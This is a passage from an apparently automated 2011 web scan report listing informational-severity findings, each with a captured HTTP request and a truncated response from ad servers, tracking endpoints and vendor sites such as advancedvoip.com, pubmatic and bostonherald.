Host: advancedvoip.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Length: 103
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 16 Sep 2011 19:47:07 GMT
Connection: close

<html><head><title>Error</title></head><body>The system cannot find the file specified.
</body></html>

26.7. http://advancedvoip.com/images/voip_billing_solution_partner_bp.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://advancedvoip.com
Path:   /images/voip_billing_solution_partner_bp.jpg

Request

GET /images/voip_billing_solution_partner_bp.jpg HTTP/1.1
Host: advancedvoip.com
Proxy-Connection: keep-alive
Referer: http://advancedvoip.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Length: 103
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 16 Sep 2011 19:47:07 GMT
Connection: close

<html><head><title>Error</title></head><body>The system cannot find the file specified.
</body></html>

26.8. http://aud.pubmatic.com/AdServer/Artemis  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://aud.pubmatic.com
Path:   /AdServer/Artemis

Request

GET /AdServer/Artemis?dpid=1&segid=D HTTP/1.1
Host: aud.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://ads.pubmatic.com/AdServer/js/dppix.html?p=27330&s=27331&a=23101
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; KRTBCOOKIE_80=1336-d454714d-69b5-4195-969b-ba426f1012c3.; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_218=4056--5675633421699857517=; KRTBCOOKIE_200=3683-d0f5e0cea474; KRTBCOOKIE_16=226-3620501663059719663; pubtime_27331=TMC; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758; KTPCACOOKIE=YES; SYNCUPPIX_ON=YES; USCC=ONE; DPPIX_ON=YES; PUBMDCID=1; PMDTSHR=cat:

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:17:13 GMT
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Connection: close
Content-Type: text/html
Content-Length: 7

success

26.9. http://b3.mookie1.com/2/TRACK_ATT/LP/cntacp_22UverseLPtest_LP_1_new/1[timestamp]@Bottom3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TRACK_ATT/LP/cntacp_22UverseLPtest_LP_1_new/1[timestamp]@Bottom3

Request

GET /2/TRACK_ATT/LP/cntacp_22UverseLPtest_LP_1_new/1[timestamp]@Bottom3? HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://attuverseoffers.com/tv_hsi_bundles/index.php?sendVar=20State_49PromoOffer&source=ECbc0000000WIP00O&fbid=9Lm6uVSxV_u
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATT=TribalFusionB3; %2emookie1%2ecom/%2f/1/o=0/cookie; optouts=cookies; RMOPTOUT=3

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:39:06 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 419
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TRACK_ATT/LP/cntacp_22UverseLPtest_LP_1_new/1[timestamp]/L9/661651530/Bottom3/USNetwork/TRACK_Default/TRACK_Default_1x1pixel-.gif/4d686437616b
...[SNIP]...

26.10. http://bgs-soft.com/Products_Sgagent.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bgs-soft.com
Path:   /Products_Sgagent.html

Request

GET /Products_Sgagent.html HTTP/1.1
Host: bgs-soft.com
Proxy-Connection: keep-alive
Referer: http://bgs-soft.com/sgagent/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Tue, 12 Sep 2006 11:46:33 GMT
Accept-Ranges: bytes
ETag: "5b8591861d6c61:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Fri, 16 Sep 2011 19:47:16 GMT
Content-Length: 153

<html>
<head>
<meta http-equiv="refresh" content="0;url=Products_Sgagent.asp">
</head>
<body>
Page moved to Products_Sgagent.asp
</body>
</html>

26.11. http://bgs-soft.com/sgagent/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bgs-soft.com
Path:   /sgagent/

Request

GET /sgagent/ HTTP/1.1
Host: bgs-soft.com
Proxy-Connection: keep-alive
Referer: http://www.radius-server.net/aradial-radius-server-billing-partners-inner.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Thu, 24 Aug 2006 13:20:09 GMT
Accept-Ranges: bytes
ETag: "330d5580c7c61:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Fri, 16 Sep 2011 19:47:16 GMT
Content-Length: 161

<html>
<head>
<meta http-equiv="refresh" content="0;url=../Products_Sgagent.html">
</head>
<body>
Page moved to ../Products_Sgagent.html
</body>
</html>

26.12. http://bh.heraldinteractive.com/includes/processAds.bg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bh.heraldinteractive.com
Path:   /includes/processAds.bg

Request

GET /includes/processAds.bg?position=Middle&companion=Top,x14,x15,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com/sports/home HTTP/1.1
Host: bh.heraldinteractive.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/mobile/info.bg
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1141638517-1316021781233

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:07:29 GMT
Server: Apache/2.2.4 (Unix) PHP/5.2.0-8+etch16
X-Powered-By: PHP/5.2.0-8+etch16
Vary: Accept-Encoding
Content-Length: 1885
Connection: close
Content-Type: text/html


<style type="text/css">
   /* div { top: 0px; } */
</style>


<!--- 1st Section: Delivery Attempt via JX tag. --->
<SCRIPT LANGUAGE="JavaScript1.1" SRC="http://oascentral.bostonherald.com/Rea
...[SNIP]...

26.13. http://bs.serving-sys.com/BurstingPipe/adServer.bs  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Request

GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=3088279&PluID=0&w=300&h=250&ord=5584185&ucm=true&ncu=$$http://ad.doubleclick.net/click%3Bh%3Dv8/3b85/17/db/%2a/a%3B244265875%3B0-0%3B1%3B36677570%3B4307-300/250%3B43616108/43633895/1%3B%3B%7Esscs%3D%3fhttp://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/news/home/L34/777269766/Middle/BostonHerald/PhantomOpera_ETN_300x250/PhantomOpera_ETN_300x250.html/4d686437616b35776e72734144666853?$$ HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fhome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ebOptOut=TRUE

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Sat, 17 Sep 2011 01:09:55 GMT
Connection: close
Content-Length: 2246

var ebPtcl="http://";var ebBigS="ds.serving-sys.com/BurstingCachedScripts/";var ebResourcePath="ds.serving-sys.com/BurstingRes//";var ebRand=new String(Math.random());ebRand=ebRand.substr(ebRand.index
...[SNIP]...

26.14. http://ca.rtb.prod2.invitemedia.com/build_creative  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ca.rtb.prod2.invitemedia.com
Path:   /build_creative

Request

GET /build_creative?click_url=http://track.pubmatic.com/AdServer/AdDisplayTrackerServlet?clickData=wmoAAMNqAAA/WgAAOAUAAAAAAAAAAAAAAAAAAAEAAAAAAAAA8wAAANgCAABaAAAABwAAAAAAAAAAAAAAAgAAADU1Nzg1MzA3LUE1REMtNEUzQS1CNDUyLUREQkQ0MjZEM0ExRAAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAA_url=&cost=0.7415&mapped_uid=7-55785307-A5DC-4E3A-B452-DDBD426D3A1D&us_id=6538&creative_id=130642&campaign_id=66395&source_url=http%3A%2F%2Fwww.bostonherald.com&exch_id=7&auction_id=16233E2D-E708-4A27-9A6C-AFFA9B0751F6&pub_line_item_id=29836&inv_size_id=70251&referrer_url=http%3A%2F%2Fad.afy11.net%2Fad%3FasId%3D1000007248707%26sd%3D2x728x90%26ct%3D15%26enc%3D0%26nif%3D0%26sf%3D0%26sfd%3D0%26ynw%3D0%26anw%3D1%26rand%3D38484872%26rk1%3D72091245%26rk2%3D1316239534.984%26pt%3D0&line_item_id=725814&invite_uid=d454714d-69b5-4195-969b-ba426f1012c3&zip_code=75207 HTTP/1.1
Host: ca.rtb.prod2.invitemedia.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000007248707&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=38484872&rk1=72091245&rk2=1316239534.984&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=*

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Sat, 17 Sep 2011 01:04:09 GMT
Content-Type: text/html
Content-Length: 2965
Connection: keep-alive

<html>
<style>
body { margin:0px; padding:0px; }
</style>
<body>
<iframe src="http://view.atdmt.com/COM/iview/335787632/direct;wi.728;hi.90/01?click=http%3A%2F%2Fg.ca.bid.i
...[SNIP]...

26.15. http://content.pulse360.com/EF949BBC-E1FB-11DF-83A0-DE09EDADD848  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://content.pulse360.com
Path:   /EF949BBC-E1FB-11DF-83A0-DE09EDADD848

Request

GET /EF949BBC-E1FB-11DF-83A0-DE09EDADD848?cb=1450864799 HTTP/1.1
Host: content.pulse360.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000005414207&sd=2x300x250&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=91119514&rk1=18936363&rk2=1316239536.352&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pulse360-opt-out=1

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:04:10 GMT
Server: Barista/1.1
Connection: Keep-Alive
Content-Type: text/html
p3p: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Content-Length: 13448

document.write('<style type="text/css"> div#p360-hybrid300x250TriadBlackGreen-EF949BBC-E1FB-11DF-83A0-DE09EDADD848 { width: 300px; left: 0; font-family: sans-serif; position: relative; d
...[SNIP]...

26.16. http://cplads.appspot.com/file/104441593408970093297/AIO_300x250_6_27_2011/1309205690/GoogleForm_dp.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cplads.appspot.com
Path:   /file/104441593408970093297/AIO_300x250_6_27_2011/1309205690/GoogleForm_dp.html

Request

GET /file/104441593408970093297/AIO_300x250_6_27_2011/1309205690/GoogleForm_dp.html?click_url=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBAWh0NO9zTsjyLbKGgALEnPHxBsXRq7cC_beIxzTAjbcBkMmHGhABGAEgy5WvEzgAUJGX3-j9_____wFgyQagAcvzheIDsgELd3d3LnRtei5jb226AQozMDB4MjUwX2FzyAEJ2gETaHR0cDovL3d3dy50bXouY29tL-ABArgCGMgCndDbHagDAegD-wPoA7gB9QMACACEoAYR%26num%3D1%26sig%3DAOD64_02j6kYV9LB8nl9oUrafQaSpBkj3Q%26client%3Dca-pub-7832112837345590%26adurl%3D HTTP/1.1
Host: cplads.appspot.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7832112837345590&output=html&h=250&slotname=7188170409&w=300&lmt=1316256809&flash=10.3.183&url=http%3A%2F%2Fwww.tmz.com%2F&dt=1316238807465&bpp=11&shv=r20110907&jsv=r20110914&prev_slotnames=9104404504&correlator=1316238804075&frm=4&adk=4076430307&ga_vid=1637260738.1316238804&ga_sid=1316238804&ga_hid=348414659&ga_fc=0&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=20&u_nmime=100&dff=arial&dfs=14&biw=1071&bih=870&prodhost=googleads.g.doubleclick.net&fu=0&ifi=2&dtd=2082&xpc=qU1fVHR0ss&p=http%3A//www.tmz.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Content-Type: text/html
Date: Sat, 17 Sep 2011 00:52:16 GMT
Server: Google Frontend
Content-Length: 15243

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml"><head>

<script src="http:
...[SNIP]...

26.17. http://freeradius.org/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://freeradius.org
Path:   /

Request

GET / HTTP/1.1
Host: freeradius.org
Proxy-Connection: keep-alive
Referer: http://blekko.com/ws/radius+server
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:44:38 GMT
Server: Apache/2.2.8 (Ubuntu) mod_ssl/2.2.8 OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8
Last-Modified: Tue, 12 Jul 2011 19:09:47 GMT
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 14197

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>FreeRADIUS: The world's most po
...[SNIP]...

26.18. http://fw.adsafeprotected.com/rjsi/dc/10339/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fw.adsafeprotected.com
Path:   /rjsi/dc/10339/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9

Request

GET /rjsi/dc/10339/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9;sz=728x90;click0=http://c.casalemedia.com/c/2/1/88646/;ord=3485630955 HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://3ps.go.com/DynamicAd?srvc=abc&adTypes=Banner-Remnant&url=/primetime/charlies-angels/bios/eve-french
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=CB9FFEBBBCE4BAB37F0CF0124340889C; Path=/
Content-Type: text/html
Date: Sat, 17 Sep 2011 01:07:57 GMT
Connection: close

<html>
<head></head>
<body>
<script type="text/javascript"><!--

var adsafeVisParams = {
   mode : "jsi",
   jsref : "http://3ps.go.com/DynamicAd?srvc=abc&adTypes=Banner-Remnant&url=/primetime/charlies-an
...[SNIP]...

26.19. http://jcp.org/aboutJava/communityprocess/maintenance/jsr234/index2.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://jcp.org
Path:   /aboutJava/communityprocess/maintenance/jsr234/index2.html

Request

GET /aboutJava/communityprocess/maintenance/jsr234/index2.html HTTP/1.1
Host: jcp.org
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.jcp.org/en/jsr/detail?id=234

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Fri, 16 Sep 2011 19:56:56 GMT
Content-type: text/html
Content-Length: 17825

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN">
<HTML>
<HEAD>


<!------------------------------->
<!-- ABOUT THIS HTML -->
<!------------------------------->
<!-- FOLLOW THESE COMMENTS FO
...[SNIP]...

26.20. http://now.eloqua.com/visitor/v200/svrGP.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://now.eloqua.com
Path:   /visitor/v200/svrGP.aspx

Request

GET /visitor/v200/svrGP.aspx?pps=3&siteid=1523&ref2=http%3A//www.google.com/search%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dnntp+server&tzo=360&ms=203 HTTP/1.1
Host: now.eloqua.com
Proxy-Connection: keep-alive
Referer: http://www.giganews.com/?gclid=CMbM1MnAoqsCFQNggwod4mqsoA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ELOQUA=GUID=F788D26BA3284C76A75E75F5D13F522A; ELQSTATUS=OK

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Vary: Accept-Encoding
P3P: CP="IDC DSP COR DEVa TAIa OUR BUS PHY ONL UNI COM NAV CNT STA",
Date: Fri, 16 Sep 2011 19:31:17 GMT
Content-Length: 49

GIF89a...................!.......,...........T..;

26.21. http://oascentral.bostonherald.com/RealMedia/ads/adstream_sx.ads/bh.heraldinteractive.com/video/129334548@x91  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oascentral.bostonherald.com
Path:   /RealMedia/ads/adstream_sx.ads/bh.heraldinteractive.com/video/129334548@x91

Request

GET /RealMedia/ads/adstream_sx.ads/bh.heraldinteractive.com/video/129334548@x91 HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://c.brightcove.com/services/viewer/federated_f9?isVid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=Mhd7ak5wnrsADfhS; __qca=P0-565564501-1316021626456; NSC_d12efm_qppm_iuuq=ffffffff09499e4145525d5f4f58455e445a4a423660; RMFD=011R4jGHO201yed8|O2021J3t|O3021J78|O2021J7A|O2021J7F|O10226KY|O20226Kk; __utma=235728274.611537932.1316021623.1316021623.1316239291.2; __utmb=235728274.35.10.1316239294; __utmc=235728274; __utmz=235728274.1316021623.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:48:17 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
ntCoent-Length: 353
Content-Type: text/html
Cache-Control: private
Content-Length: 353

<A HREF="http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/video/L30/206043154/x91/BostonHerald/TremorMedia_network_instream/Tremor_Media_092209_tracking/4d6864376
...[SNIP]...

26.22. http://odb.outbrain.com/utils/ping.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://odb.outbrain.com
Path:   /utils/ping.html

Request

GET /utils/ping.html?random=0.6846127999015152 HTTP/1.1
Host: odb.outbrain.com
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/2011/09/15/michaele-salahi-journey-neal-schon-affair-years-in-the-making-tareq-cheating-marriage-white-house-crashers-real-housewives-of-dc/?adid=hero3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: obuid=7a957d2b-640c-464a-8acd-8219f3607c99; tick=1316220936567; _lvs2="7o9zvLIDBgZ/PDZJG4J4VcCxVx+pz+vfyPm975gFPm+3JT8CAr5BQAcO/CD2iJ2OomCz617Au40="; _lvd2="eMOLTpv1no2amRCwbsQHJs5ztY1Fx+rEq8YUDxVG3BP6hVox5+F4+/M7CxYsJDnxTURpOGo6ZNkZw69B7h6E1sMF0XSBEZRLE75RDxSwUMqkfVlejxXOILIvcogbdib9HJJKMWdu3/A="; _rcc2="/RlY4kI4x+EC5hF25OSb5Q=="; recs-6a9250000f8bdf31c8744c5bafc327c0="ZzAE/ktjesdeNFlXZ49FMhJVhafYPcPgLkUrQgKyP5dRrm2fnBRV2fSb/IdwA62N3ZxR/ggt50glYhkt69YxgNxTpgOHGlPC+xoCSjlRu8m0a3QZy00XGKvEjfibUWU69qJMoHFHxrJ5WOXcO9UcZQ=="

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-cache
Pragma: no-cache
Accept-Ranges: bytes
ETag: W/"158-1311068672000"
Last-Modified: Tue, 19 Jul 2011 09:44:32 GMT
Content-Type: text/html
Content-Length: 158
Date: Sat, 17 Sep 2011 00:55:40 GMT

<html>
   <head>
       <META HTTP-EQUIV="Cache-Control" CONTENT="no-cache">
       <META HTTP-EQUIV="Pragma" CONTENT="no-cache">
   </head>
   <body>
   </body>
</html>

26.23. http://p4.choubllcbxhka.a3wlja2w5g6k7l2x.if.v4.ipv6-exp.l.google.com/intl/en/ipv6/exp/redir.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://p4.choubllcbxhka.a3wlja2w5g6k7l2x.if.v4.ipv6-exp.l.google.com
Path:   /intl/en/ipv6/exp/redir.html

Request

GET /intl/en/ipv6/exp/redir.html HTTP/1.1
Host: p4.choubllcbxhka.a3wlja2w5g6k7l2x.if.v4.ipv6-exp.l.google.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7832112837345590&output=html&h=90&slotname=9104404504&w=728&lmt=1316257020&flash=10.3.183&url=http%3A%2F%2Fwww.tmz.com%2F2011%2F09%2F16%2Fron-artest-name-change-official-metta-world-peace-legal-judge-petition-granted-lakers%2F%3Fadid%3Dhero2&dt=1316239020413&bpp=15&shv=r20110907&jsv=r20110914&correlator=1316239020439&frm=4&adk=974859732&ga_vid=740357519.1316239021&ga_sid=1316239021&ga_hid=785573060&ga_fc=0&u_tz=-300&u_his=6&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=20&u_nmime=100&dff=arial&dfs=14&adx=171&ady=8&biw=1071&bih=870&eid=36887102&ref=http%3A%2F%2Fwww.tmz.com%2F2011%2F09%2F16%2Fnancy-grace-dancing-tmz-live-video-partner-tristan-macmanus-dancing-with-the-stars%2F&prodhost=googleads.g.doubleclick.net&fu=0&ifi=1&dtd=179&xpc=3ntOAQLViT&p=http%3A//www.tmz.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
